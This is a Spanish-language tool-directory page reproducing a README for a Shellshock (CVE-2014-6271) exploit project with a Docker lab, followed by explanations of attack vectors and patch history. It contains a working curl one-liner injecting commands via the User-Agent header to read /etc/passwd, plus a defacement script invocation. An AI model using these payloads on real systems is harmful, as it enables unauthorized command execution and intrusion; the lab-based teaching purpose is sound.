Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
exploit-CVE-2014-6271 — Exploit de Shellshock + entorno vulnerable | Kitploit
Herramientas/GitHubGitHub/opsxcq/exploit-cve-2014-6271
Seguridad de ContenedoresAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebAprendizaje y EducaciónLabs y Práctica
GitHubopsxcq/exploit-cve-2014-6271

exploit-CVE-2014-6271

Exploit de Shellshock + entorno vulnerable

Ver Repositorio
230606hace 9 añosRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Sitio web

Logo

Exploit de Shellshock + entorno vulnerable

Docker Pulls

Shellshock, también conocido como Bashdoor, es una familia de errores de seguridad en el ampliamente utilizado shell Bash de Unix, el primero de los cuales fue divulgado el 24 de septiembre de 2014. Muchos servicios expuestos a Internet, como algunas implementaciones de servidores web, utilizan Bash para procesar ciertas solicitudes, lo que permite a un atacante hacer que las versiones vulnerables de Bash ejecuten comandos arbitrarios. Esto puede permitir a un atacante obtener acceso no autorizado a un sistema informático.

Ejecutar un entorno vulnerable

Necesitarás tener Docker instalado para ejecutar el entorno, ve a docker.com e instálalo si aún no lo tienes.

Para iniciar el entorno vulnerable, simplemente ejecuta

root@kitploit:~
docker run --rm -it -p 8080:80 vulnerables/cve-2014-6271

Abre tu navegador y ve a localhost:8080, si todo está bien, verás una página como esta

vulnerable

Explotación

Hay varias formas de explotar esta vulnerabilidad

Explotarlo con una sola línea

Un ejemplo sencillo para cat /etc/passwd

root@kitploit:~
curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'" \
http://localhost:8080/cgi-bin/vulnerable

Puedes usarlo para ejecutar cualquier comando que quieras

Explotación para defacement

Este es solo un código de ejemplo en exploit-deface.sh, simplemente ejecútalo contra la imagen

root@kitploit:~
./exploit-deface.sh <ip> <port>

Por ejemplo si lo estás ejecutando con el comando proporcionado anteriormente

root@kitploit:~
./exploit-deface.sh localhost 8080

Solo actualiza tu navegador y verás

Deface

Prueba tu sistema

Solo ejecuta este script de bash en tu sistema y verás si eres vulnerable o no:

root@kitploit:~
env 'VAR=() { :;}; echo Bash is vulnerable!' 'FUNCTION()=() { :;}; echo Bash is vulnerable!' bash -c "echo Bash Test"

Vectores de explotación

Servidor web basado en CGI

Cuando un servidor web utiliza la Interfaz de entrada común (CGI) para manejar una solicitud de documento, pasa varios detalles de la solicitud a un programa manejador en la lista de variables de entorno. Por ejemplo, la variable HTTP_USER_AGENT tiene un valor que, en el uso normal, identifica el programa que envía la solicitud. Si el manejador de la solicitud es un script de Bash, o si ejecuta uno, por ejemplo mediante la llamada system(3), Bash recibirá las variables de entorno pasadas por el servidor y las procesará como se describió anteriormente. Esto proporciona un medio para que un atacante active la vulnerabilidad Shellshock con una solicitud de servidor especialmente manipulada. La documentación de seguridad del ampliamente utilizado servidor web Apache afirma: "Los scripts CGI pueden ... ser extremadamente peligrosos si no se revisan cuidadosamente." y a menudo se utilizan otros métodos para manejar las solicitudes de los servidores web. Existen varios servicios en línea que intentan probar la vulnerabilidad contra servidores web expuestos a Internet.

Servidor OpenSSH

OpenSSH tiene una función "ForceCommand", en la que se ejecuta un comando fijo cuando el usuario inicia sesión, en lugar de ejecutar simplemente un shell de comandos sin restricciones. El comando fijo se ejecuta incluso si el usuario especificó que debía ejecutarse otro comando; en ese caso, el comando original se coloca en la variable de entorno "SSH_ORIGINAL_COMMAND". Cuando el comando forzado se ejecuta en un shell Bash (si el shell del usuario está configurado como Bash), el shell Bash analizará la variable de entorno SSH_ORIGINAL_COMMAND al iniciarse y ejecutará los comandos incrustados en ella. El usuario ha utilizado su acceso al shell restringido para obtener acceso sin restricciones al shell, aprovechando el error de Shellshock.

Clientes DHCP

Algunos clientes DHCP también pueden pasar comandos a Bash; un sistema vulnerable podría ser atacado al conectarse a una red Wi-Fi abierta. Un cliente DHCP normalmente solicita y obtiene una dirección IP de un servidor DHCP, pero también se le pueden proporcionar una serie de opciones adicionales. Un servidor DHCP malicioso podría proporcionar, en una de estas opciones, una cadena manipulada para ejecutar código en una estación de trabajo o portátil vulnerable.

Servidor Qmail

Cuando se utiliza Bash para procesar mensajes de correo electrónico (por ejemplo, mediante .forward o el pipe de qmail-alias), el servidor de correo qmail pasa la entrada externa de una manera que puede explotar una versión vulnerable de Bash.

Shell restringido de IBM HMC

El error puede explotarse para obtener acceso a Bash desde el shell restringido de la Consola de administración de hardware de IBM, una pequeña variante de Linux para administradores de sistemas. IBM lanzó un parche para resolver esto.

Solución

Hasta el 24 de septiembre de 2014, el mantenedor de Bash, Chet Ramey, proporcionó una versión de parche, bash43-025, de Bash 4.3, que abordaba CVE-2014-6271 y que ya había sido empaquetada por los mantenedores de las distribuciones. El 24 de septiembre, le siguió bash43-026, que abordaba CVE-2014-7169. Luego se descubrió CVE-2014-7186. Florian Weimer de Red Hat publicó un código de parche para esto "extraoficialmente" el 25 de septiembre, que Ramey incorporó a Bash como bash43-027. Estos parches proporcionaban solo código, útil únicamente para quienes saben cómo compilar ("reconstruir") un nuevo binario ejecutable de Bash a partir del archivo de parche y los archivos de código fuente restantes.

Al día siguiente, Red Hat presentó oficialmente las actualizaciones correspondientes para Red Hat Enterprise Linux y, un día después, para Fedora 21. Canonical Ltd. presentó actualizaciones para sus versiones de soporte a largo plazo de Ubuntu el sábado 27 de septiembre; el domingo, hubo actualizaciones para SUSE Linux Enterprise. El lunes y martes siguientes, al final del mes, aparecieron las actualizaciones de Apple OS X.

El 1 de octubre de 2014, Michał Zalewski de Google Inc. declaró finalmente que el código de Weimer y bash43-027 habían corregido no solo los primeros tres errores, sino incluso los tres restantes que se publicaron después de bash43-027, incluidos sus propios dos descubrimientos. Esto significa que, después de las actualizaciones anteriores de las distribuciones, no se han requerido más actualizaciones para cubrir los seis problemas.

Descargo de responsabilidad

Este programa, o los programas anteriores, son SOLO para fines educativos. No los utilices sin permiso. Se aplica el descargo de responsabilidad habitual, especialmente el hecho de que yo (opsxcq) no soy responsable de ningún daño causado por el uso directo o indirecto de la información o la funcionalidad proporcionada por estos programas. El autor o cualquier proveedor de Internet NO tiene responsabilidad alguna por el contenido o el mal uso de estos programas o de cualquier derivado de los mismos. Al utilizar estos programas, aceptas el hecho de que cualquier daño (pérdida de datos, caída del sistema, compromiso del sistema, etc.) causado por el uso de estos programas no es responsabilidad de opsxcq.

Descargar herramienta